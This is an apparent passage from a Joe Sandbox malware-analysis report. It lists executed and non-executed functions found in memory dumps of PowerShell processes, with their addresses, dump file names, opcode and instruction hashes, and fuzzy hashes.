                                                                                                                                                                          • Instruction ID: 6d4cdac61311d44cebb0aae4736125fbde6f15cef96f9beaf9086d091a66beff
                                                                                                                                                                          • Opcode Fuzzy Hash: 5428300f24bcf0b02d88e0c2dffd9cfbb83a4ea36748404a130a0ef80ee7a92f
                                                                                                                                                                          • Instruction Fuzzy Hash: A7F0B43091964C8FCB51DF1888195E57FE0FF25300B0101ABE449C7071E6659904CBC1
                                                                                                                                                                          Function 00007FFD9B8EED40 Relevance: .1, Instructions: 124COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.2795802441.00007FFD9B8ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8ED000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_7ffd9b8ed000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 6a0b7cbc4891af292e7f03ba07c202fa8fd48f603dcf7633fc667e609827f300
                                                                                                                                                                          • Instruction ID: 83f87069492edd0b942694fadac2ba8800a9cda961c2b64247c60173b374f2e6
                                                                                                                                                                          • Opcode Fuzzy Hash: 6a0b7cbc4891af292e7f03ba07c202fa8fd48f603dcf7633fc667e609827f300
                                                                                                                                                                          • Instruction Fuzzy Hash: 5B41277050EBC44FD79A9B2C9851A523FF0EF56321B1A05DFD088CB5A3D629A846C792
                                                                                                                                                                          Function 00007FFD9BA097A8 Relevance: .1, Instructions: 113COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.2803115305.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_7ffd9ba00000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 64ea36090fdfa5479d779a30f3b2ee682749c868dc56777b1bb448bd20f65062
                                                                                                                                                                          • Instruction ID: 7f69f4a09e33306cf73a7e450f5f8842d070a20a39c2624e4e294e065827ea4a
                                                                                                                                                                          • Opcode Fuzzy Hash: 64ea36090fdfa5479d779a30f3b2ee682749c868dc56777b1bb448bd20f65062
                                                                                                                                                                          • Instruction Fuzzy Hash: C731B331A1CB4C8FDB18DF4CA84A6A97BE0FB99321F00422FE449D3251CA71A855CBC2
                                                                                                                                                                          Function 00007FFD9BA0A64C Relevance: .1, Instructions: 101COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.2803115305.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_7ffd9ba00000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 77eaf251c877db941e55362c1356605d31d5aeac2506bd14c3f68a349c247ab9
                                                                                                                                                                          • Instruction ID: b5e4a48adbf912fa1387c517b5d5f2fe63ae95a32f1aed4eea7b97c7a0eef2bf
                                                                                                                                                                          • Opcode Fuzzy Hash: 77eaf251c877db941e55362c1356605d31d5aeac2506bd14c3f68a349c247ab9
                                                                                                                                                                          • Instruction Fuzzy Hash: 7C21063190CB4C4FDB59DFAC984A7E97FF0EB56320F04426BD049C3162DA75A85ACB91
                                                                                                                                                                          Function 00007FFD9BA033B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.2803115305.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_7ffd9ba00000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                          • Instruction ID: fd0e0d0e09885213c395faa1ca4486af676892c803fc570850bcd53762d5f05f
                                                                                                                                                                          • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                          • Instruction Fuzzy Hash: 6F01677121CB0D4FD748EF0CE451AA5B7E0FB99364F10056DE58AC36A5DB36E882CB46
                                                                                                                                                                          Function 00007FFD9BAD414D Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.2810937253.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_7ffd9bad0000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 42f1f6757b325b268447a62e0f39729e6b9004232d5d9e835f7d44587254651d
                                                                                                                                                                          • Instruction ID: e1cc6c89a89e9ba7a721b261e804aa01ac8a4fa9e01c3454d27f86b3bcc9507d
                                                                                                                                                                          • Opcode Fuzzy Hash: 42f1f6757b325b268447a62e0f39729e6b9004232d5d9e835f7d44587254651d
                                                                                                                                                                          • Instruction Fuzzy Hash: 01F09A32B0E9098FD768EB4CE4518E873E0EF95320B1600BBE1ADC75B3CA25EC408740
                                                                                                                                                                          Function 00007FFD9BAD4400 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.2810937253.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_7ffd9bad0000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: c4d6fba2d799aa0bf7809a56250d1a2d55bc6cb2828eb0b00e8725dad50403ee
                                                                                                                                                                          • Instruction ID: bc7f985a0839a891a45ae042c8ceda9230e44c7bb71f731130ed0b27a99beb28
                                                                                                                                                                          • Opcode Fuzzy Hash: c4d6fba2d799aa0bf7809a56250d1a2d55bc6cb2828eb0b00e8725dad50403ee
                                                                                                                                                                          • Instruction Fuzzy Hash: 25F0E232B0E5498FDBA4EB4CE0648A877E0FF8532470600BAE19DCB4B3CA25EC80C740
                                                                                                                                                                          Function 00007FFD9BAD41D1 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.2810937253.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_7ffd9bad0000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                                                                                          • Instruction ID: 060cbf5c6926f9373921e1497c4419669a32376a66f6ed45d368bdca15d30b57
                                                                                                                                                                          • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                                                                                          • Instruction Fuzzy Hash: DCE01A31B0C8089FDB78DB4CE0519E9B3E1EB9832171202BBE15EC7571CA22ED518B80

                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                          Function 00007FFD9BA08BFA Relevance: 6.4, Strings: 5, Instructions: 108COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000008.00000002.2803115305.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_8_2_7ffd9ba00000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: M_^6$M_^<$M_^F$M_^I$M_^J
                                                                                                                                                                          • API String ID: 0-1500707516
                                                                                                                                                                          • Opcode ID: 041ac91ce1e2f866d46e9f53b52ae62d15ede3fa734e511d0ac2dfddc52e60c4
                                                                                                                                                                          • Instruction ID: 481b3f85334ff1bb08ae2a37bc7a428d5540e389c1e6e94507e958443b483616
                                                                                                                                                                          • Opcode Fuzzy Hash: 041ac91ce1e2f866d46e9f53b52ae62d15ede3fa734e511d0ac2dfddc52e60c4
                                                                                                                                                                          • Instruction Fuzzy Hash: 8D2137773044569EE30677ADB854DDC73C0CB9427638A47F3E169CB583ED1AA48B46C0

                                                                                                                                                                          Executed Functions

                                                                                                                                                                          Function 00007FFD9B8FED40 Relevance: 1.4, Strings: 1, Instructions: 125COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2783586753.00007FFD9B8FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8FD000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_7ffd9b8fd000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: mD$
                                                                                                                                                                          • API String ID: 0-1339008413
                                                                                                                                                                          • Opcode ID: 6a112d6c54a674d0f8fa65e9ef8e4b2790c94edacaa888aff0182a134ba2fdc8
                                                                                                                                                                          • Instruction ID: bb064a47062e935be918a39ead1447772275845f715c82da5937d52ccbe18101
                                                                                                                                                                          • Opcode Fuzzy Hash: 6a112d6c54a674d0f8fa65e9ef8e4b2790c94edacaa888aff0182a134ba2fdc8
                                                                                                                                                                          • Instruction Fuzzy Hash: E941367150EBC44FE7569B2C98519523FF0EF5A220B1A05DFD088CB5A3D629AC4AC792
                                                                                                                                                                          Function 00007FFD9BAE6605 Relevance: .4, Instructions: 441COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2798263983.00007FFD9BAE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_7ffd9bae0000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 5424af148608fe0c648fe15b1739dab25a4e807a7bfdd68e68e97366a54ecff0
                                                                                                                                                                          • Instruction ID: dc9ac703b5b2b8b778169944a00303674f8ffcaf454394f2d078c1f16ba55ac4
                                                                                                                                                                          • Opcode Fuzzy Hash: 5424af148608fe0c648fe15b1739dab25a4e807a7bfdd68e68e97366a54ecff0
                                                                                                                                                                          • Instruction Fuzzy Hash: 9ED14622A1FA8E4FEBA5DB6C48654B57BE0EF56314B0905FED09DCB0E3DA58AC05C341
                                                                                                                                                                          Function 00007FFD9BA19728 Relevance: .2, Instructions: 158COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2790157379.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_7ffd9ba10000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 1ff9a945ba9c0ccad45af3c559f9a3167a5d453a99b0e882d5b49f2cc43a4609
                                                                                                                                                                          • Instruction ID: ab1751ce0ed18a298c5f42f14503c67057358839ec42d9162e5cbc272bc48f45
                                                                                                                                                                          • Opcode Fuzzy Hash: 1ff9a945ba9c0ccad45af3c559f9a3167a5d453a99b0e882d5b49f2cc43a4609
                                                                                                                                                                          • Instruction Fuzzy Hash: 9A414C71A0DBC84FEB58AF5CA85A6A87BE1FF55310F04416FE04883297DA74B916C7C2
                                                                                                                                                                          Function 00007FFD9BA1A4AC Relevance: .1, Instructions: 99COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2790157379.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_7ffd9ba10000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 83def46bf60530acc025e88bc7a6283e8471f1e12a8b46f47523dbae73b5bb0a
                                                                                                                                                                          • Instruction ID: 8819186263c4526dc8cf812dec1117c2d03598132418983c12a506dfaae2f8aa
                                                                                                                                                                          • Opcode Fuzzy Hash: 83def46bf60530acc025e88bc7a6283e8471f1e12a8b46f47523dbae73b5bb0a
                                                                                                                                                                          • Instruction Fuzzy Hash: F4213A3190CB4C4FDB59DBACD84A7E97FF0EB96320F04416BD448C7166DA74941ACB92
                                                                                                                                                                          Function 00007FFD9BA133B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2790157379.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_7ffd9ba10000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                                          • Instruction ID: a55e2f9db695d2b793887dbbac947a38dbbc7038fa19d01ed2a818b736cadb46
                                                                                                                                                                          • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                                          • Instruction Fuzzy Hash: 0201677121CB0C4FDB48EF0CE451AA5B7E0FB95364F10056EE58AC36A5DB36E882CB45
                                                                                                                                                                          Function 00007FFD9BA19CF8 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2790157379.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_7ffd9ba10000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 8fdc2d8b74044534f041cee60e3fef8a134d22b4131c0998c2b89fcf5c221d2b
                                                                                                                                                                          • Instruction ID: 538a71679b21f5c1c7c14fa512ebb20642ed46c3c1d96eb601e7c278a76e064a
                                                                                                                                                                          • Opcode Fuzzy Hash: 8fdc2d8b74044534f041cee60e3fef8a134d22b4131c0998c2b89fcf5c221d2b
                                                                                                                                                                          • Instruction Fuzzy Hash: 94F0243180868D4FDB46EF2888694D57FA0EF26310B0502DBE448C70B2DB649558CB82
                                                                                                                                                                          Function 00007FFD9BAE414D Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2798263983.00007FFD9BAE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_7ffd9bae0000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: eb1ec59f2b866e62f2de06e0d14eee2004c575b0a9b3c66cfd2e4f619d760dfc
                                                                                                                                                                          • Instruction ID: 67fa2492377b1bc2a4a09ca6a274f4dd7e8ad06cae67166cf7b052172f26d0e2
                                                                                                                                                                          • Opcode Fuzzy Hash: eb1ec59f2b866e62f2de06e0d14eee2004c575b0a9b3c66cfd2e4f619d760dfc
                                                                                                                                                                          • Instruction Fuzzy Hash: E8F09A32B0E9098FDB68EB4CE4518A873E4EF5932071600BBE16DC75B3CA25EC408741
                                                                                                                                                                          Function 00007FFD9BAE4400 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2798263983.00007FFD9BAE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_7ffd9bae0000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: c2263dadcc79f092e54f0cde6757628ec0a163a9746df501ef987dd9d747fdfe
                                                                                                                                                                          • Instruction ID: 64a795e4ed0b53610db387ec15f7bec173df60141e7fcfad9367823f7a254997
                                                                                                                                                                          • Opcode Fuzzy Hash: c2263dadcc79f092e54f0cde6757628ec0a163a9746df501ef987dd9d747fdfe
                                                                                                                                                                          • Instruction Fuzzy Hash: F8F08232B0E5498FDB64EB5CE4618A877E0FF4532475600BAE15DCB4B3DA25EC50C751
                                                                                                                                                                          Function 00007FFD9BAE41D1 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2798263983.00007FFD9BAE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_7ffd9bae0000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                                                                                          • Instruction ID: 64e0a4324ac2068c27c3aee3e024be706c3f9e484cc2c970fdfee4890e305e95
                                                                                                                                                                          • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                                                                                          • Instruction Fuzzy Hash: 86E01A31B0C8088FDA78DB4CE0519ADB3E5EB98321B1201BBE14EC7571CA22ED518B80

                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                          Function 00007FFD9BA18BFA Relevance: 6.4, Strings: 5, Instructions: 108COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2790157379.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_7ffd9ba10000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: L_^6$L_^<$L_^F$L_^I$L_^J
                                                                                                                                                                          • API String ID: 0-1031638419
                                                                                                                                                                          • Opcode ID: 6ba75b867f3a4e2f61d78990857126540108af8f77149cbe2522f970b9846968
                                                                                                                                                                          • Instruction ID: 946fc2ada6dbf8a964e3681922af9f98c0cf979c3a873bcb019cb3742860aa09
                                                                                                                                                                          • Opcode Fuzzy Hash: 6ba75b867f3a4e2f61d78990857126540108af8f77149cbe2522f970b9846968
                                                                                                                                                                          • Instruction Fuzzy Hash: 8021447B7084161EE30677ADB8419EC7380CBD427634A91B3D369CB553DA16A48F8AD0

                                                                                                                                                                          Executed Functions

                                                                                                                                                                          Function 00007FFD9BAD6605 Relevance: .4, Instructions: 445COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000B.00000002.2866578938.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ffd9bad0000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: e5ca92c0b8ac8dbd7431586422ec1f3c69a3e564890da66c80e8248c3a7b333a
                                                                                                                                                                          • Instruction ID: 9645f70aa5aaee46ea94b1484e0780ff0a8c6c9a130bdc8e0bed3bd4ea8c526a
                                                                                                                                                                          • Opcode Fuzzy Hash: e5ca92c0b8ac8dbd7431586422ec1f3c69a3e564890da66c80e8248c3a7b333a
                                                                                                                                                                          • Instruction Fuzzy Hash: ADD14921B0FACE0FEBA5DB6C48655B97BA0EF96214B0902FED49DC70E3D958AD05C341
                                                                                                                                                                          Function 00007FFD9B8EEF00 Relevance: .1, Instructions: 125COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000B.00000002.2854639050.00007FFD9B8ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8ED000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ffd9b8ed000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: aec84280af60325b56328162fe6f11eac6d8d93c9bd2269ef7b17696004cf389
                                                                                                                                                                          • Instruction ID: a038bf8b4bc7ce2ae5861043e0ed61866c5ee06a2975b449cdcfaebedc9d125f
                                                                                                                                                                          • Opcode Fuzzy Hash: aec84280af60325b56328162fe6f11eac6d8d93c9bd2269ef7b17696004cf389
                                                                                                                                                                          • Instruction Fuzzy Hash: 0941297150EBC44FD75A9B399851A523FF0EF57320B1A01DFD088CF5A3D629A846C7A2
                                                                                                                                                                          Function 00007FFD9BA0979B Relevance: .1, Instructions: 117COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000B.00000002.2861204149.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ffd9ba00000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 17b1c746c709f43a38275383e212b519cb7f346009413c99418d9ffed680576d
                                                                                                                                                                          • Instruction ID: 317ab94cf7dc74e7938bf7f9c196c3668890ea954020b46b24ba50ad20bc2929
                                                                                                                                                                          • Opcode Fuzzy Hash: 17b1c746c709f43a38275383e212b519cb7f346009413c99418d9ffed680576d
                                                                                                                                                                          • Instruction Fuzzy Hash: 2A31E671A1CB4C9FDB18DF4C984A6A97BE0FB99320F00422FE449D3251DA71A855CBC2
                                                                                                                                                                          Function 00007FFD9BA0A64C Relevance: .1, Instructions: 99COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000B.00000002.2861204149.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ffd9ba00000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 2c56483c0dbb0159194d7dcc191794f51dd06454fd21e9773dc33efa524484f5
                                                                                                                                                                          • Instruction ID: 8ff078a52fdf77613b58769ffa0f50a521cb950202194b4cbf748532b21d0c99
                                                                                                                                                                          • Opcode Fuzzy Hash: 2c56483c0dbb0159194d7dcc191794f51dd06454fd21e9773dc33efa524484f5
                                                                                                                                                                          • Instruction Fuzzy Hash: DA210630A0CB4C4FDB59DFAC984A6E97FF0EB56320F04416BD449C3162DA74985ACB91
                                                                                                                                                                          Function 00007FFD9BA033B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000B.00000002.2861204149.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ffd9ba00000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                          • Instruction ID: fd0e0d0e09885213c395faa1ca4486af676892c803fc570850bcd53762d5f05f
                                                                                                                                                                          • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                          • Instruction Fuzzy Hash: 6F01677121CB0D4FD748EF0CE451AA5B7E0FB99364F10056DE58AC36A5DB36E882CB46
                                                                                                                                                                          Function 00007FFD9BAD414D Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000B.00000002.2866578938.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ffd9bad0000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 42f1f6757b325b268447a62e0f39729e6b9004232d5d9e835f7d44587254651d
                                                                                                                                                                          • Instruction ID: e1cc6c89a89e9ba7a721b261e804aa01ac8a4fa9e01c3454d27f86b3bcc9507d
                                                                                                                                                                          • Opcode Fuzzy Hash: 42f1f6757b325b268447a62e0f39729e6b9004232d5d9e835f7d44587254651d
                                                                                                                                                                          • Instruction Fuzzy Hash: 01F09A32B0E9098FD768EB4CE4518E873E0EF95320B1600BBE1ADC75B3CA25EC408740
                                                                                                                                                                          Function 00007FFD9BAD4400 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000B.00000002.2866578938.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ffd9bad0000_powershell.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: c4d6fba2d799aa0bf7809a56250d1a2d55bc6cb2828eb0b00e8725dad50403ee
                                                                                                                                                                          • Instruction ID: bc7f985a0839a891a45ae042c8ceda9230e44c7bb71f731130ed0b27a99beb28
